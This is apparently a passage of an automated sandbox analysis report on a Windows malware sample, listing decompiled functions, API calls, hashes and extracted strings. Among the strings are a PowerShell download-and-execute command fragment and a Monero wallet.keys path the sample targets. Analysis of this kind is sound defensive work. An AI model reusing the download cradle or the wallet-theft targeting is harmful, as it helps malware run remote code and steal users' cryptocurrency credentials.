                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 0eb79d3f6723788b916a3843c3e357e7edb96dfe720696aadbb291452554af70
                                • Instruction ID: 84b794e73488781468c7c111b019136475ef88fb40e4fed276abdbf3786c8887
                                • Opcode Fuzzy Hash: 0eb79d3f6723788b916a3843c3e357e7edb96dfe720696aadbb291452554af70
                                • Instruction Fuzzy Hash: 2841DC71C002489ADB18EBA0D895BEDB7B4EF10300F44512AE516B6291EF742B8BDF95
                                Function 00EC9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EC9F41
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 93928868f1223f6e304f471c784222154b2c263332997ac25147de153de83ca5
                                • Instruction ID: d1d682f5925d946e74a7e09ffedef7e3b557c061b3043178f54d8d3cca7b3c77
                                • Opcode Fuzzy Hash: 93928868f1223f6e304f471c784222154b2c263332997ac25147de153de83ca5
                                • Instruction Fuzzy Hash: 4C615D31A1024C9BDB28EFA4CD96FED77B5EF40344F049129F90A6B281EB706B46CB51
                                Function 00ED70D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • memset.MSVCRT ref: 00ED716A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemset
                                • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 4047604823-3520659465
                                • Opcode ID: 6a4e7c737c21ade7cb9c86056dabbf69a4b88ab28662c303b3adda59090390a9
                                • Instruction ID: 083bd19b3aa168bc2d7e780ee945dd5c1bd8c9ce5fcecd7118a18bda8d3e2b37
                                • Opcode Fuzzy Hash: 6a4e7c737c21ade7cb9c86056dabbf69a4b88ab28662c303b3adda59090390a9
                                • Instruction Fuzzy Hash: 605180B0C042189FDB24EB90CD86BEEB3B4EF44304F1461AAE55576281EB746F8ACF54
                                Function 00ED6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00ED696C
                                • sscanf.NTDLL ref: 00ED6999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00ED69B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00ED69C0
                                • ExitProcess.KERNEL32 ref: 00ED69DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 9f8665494cc0dc38a0593c4f793506ed7956c79d4557125eb3b7ead11abe8e88
                                • Instruction ID: ea42297eb98378be1c3b73732eb9733252b4062d175a8ae2cb366d377da38f83
                                • Opcode Fuzzy Hash: 9f8665494cc0dc38a0593c4f793506ed7956c79d4557125eb3b7ead11abe8e88
                                • Instruction Fuzzy Hash: 4221EB75D00208ABCF09EFE4E945AEEB7B9FF48300F04852AE416F3244EB745605CB69
                                Function 00ED7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,01B7BD20,00000000,00020119,?), ref: 00ED7E5E
                                • RegQueryValueExA.ADVAPI32(?,01B8D098,00000000,00000000,000000FF,000000FF), ref: 00ED7E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00ED7E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 007fdf27ef563ed927eeecfe17581f288b63970d9869bb27744a120ae13f486e
                                • Instruction ID: 5268385cbab7b6c70f15a156a76aecaa4c50749789d7f306e1b3ecb5bc295736
                                • Opcode Fuzzy Hash: 007fdf27ef563ed927eeecfe17581f288b63970d9869bb27744a120ae13f486e
                                • Instruction Fuzzy Hash: E71191B1E44309EBD714CF94E849FBBBBB8EB44701F10412AFA15A7284D7B459418BA0
                                Function 00ED9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(01B8DD40,?,?,?,00ED140C,?,01B8DD40,00000000), ref: 00ED926C
                                • lstrcpyn.KERNEL32(0110AB88,01B8DD40,01B8DD40,?,00ED140C,?,01B8DD40), ref: 00ED9290
                                • lstrlen.KERNEL32(?,?,00ED140C,?,01B8DD40), ref: 00ED92A7
                                • wsprintfA.USER32 ref: 00ED92C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 02c0a43c231dbfdd3e214b83df22eef2945b845c943741f53676ba73270af8af
                                • Instruction ID: d0b524e44cd906e87ae9155a34f3ed7df394ec8a11adcf42fbe2b4f591658a40
                                • Opcode Fuzzy Hash: 02c0a43c231dbfdd3e214b83df22eef2945b845c943741f53676ba73270af8af
                                • Instruction Fuzzy Hash: 2E010C75900208FFCB09DFECE984EAE7BB9EF44354F108548F9099B245C6B1AA80DB90
                                Function 00EC12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EC12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EC12F5
                                • RegCloseKey.ADVAPI32(?), ref: 00EC12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 286a92fd892f9a48d61915f8e23d1781799d93cdb0e121fd449c0fed4b7bd35c
                                • Instruction ID: 74e9d79871d32d4014e98ee9526800f8cdb3de1c2f0f8afa65317c6abc6db132
                                • Opcode Fuzzy Hash: 286a92fd892f9a48d61915f8e23d1781799d93cdb0e121fd449c0fed4b7bd35c
                                • Instruction Fuzzy Hash: B40131B9E40308BBDB14DFE0E849FAEB7B8EF48701F008169FA1597284D6B19A418F50
                                Function 00ED6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00ED6663
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED6726
                                • ExitProcess.KERNEL32 ref: 00ED6755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: b74dd7682f37c4269f53047d18a3653b2cf843808b86292540acdd44d4ea4107
                                • Instruction ID: 909314bd54b1ba02b0b71445b3b8865de2c5a1069466442e4d12b4999067f349
                                • Opcode Fuzzy Hash: b74dd7682f37c4269f53047d18a3653b2cf843808b86292540acdd44d4ea4107
                                • Instruction Fuzzy Hash: 0A315CB1C00218AADB19EB90DC95BDD77B8EF44300F4061AAF21977281DFB46B89CF59
                                Function 00ED87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EE0E28,00000000,?), ref: 00ED882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8836
                                • wsprintfA.USER32 ref: 00ED8850
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 53bfc8a282d79d79ded03fff078166cf34ce1054bdb442a9e5088a995773c64b
                                • Instruction ID: 0a0e85ebe6c3c94e34cacf0923c8b0ddeeb32636b7dd1a29fce024062247b81e
                                • Opcode Fuzzy Hash: 53bfc8a282d79d79ded03fff078166cf34ce1054bdb442a9e5088a995773c64b
                                • Instruction Fuzzy Hash: E12121B1E40308AFDB14DF94ED45FAEBBB8FB48711F104119F515A7284C7B999418BA0
                                Function 00ED8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00ED951E,00000000), ref: 00ED8D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8D62
                                • wsprintfW.USER32 ref: 00ED8D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: b8b0b3e67c1305d2b76b62db1a497ef3cc71a7b0aa325f7b74b5b98991828ae5
                                • Instruction ID: 0857ac896f60b45ccfef596644b56022827b6fd9e38a5ff7aec10224574e516c
                                • Opcode Fuzzy Hash: b8b0b3e67c1305d2b76b62db1a497ef3cc71a7b0aa325f7b74b5b98991828ae5
                                • Instruction Fuzzy Hash: 66E08670E4030CBBC714DB94E809E5977B8EF04702F004065FD0997240D9B15E408B55
                                Function 00ECA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00ECA3FF
                                • lstrlen.KERNEL32(00000000), ref: 00ECA6BC
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
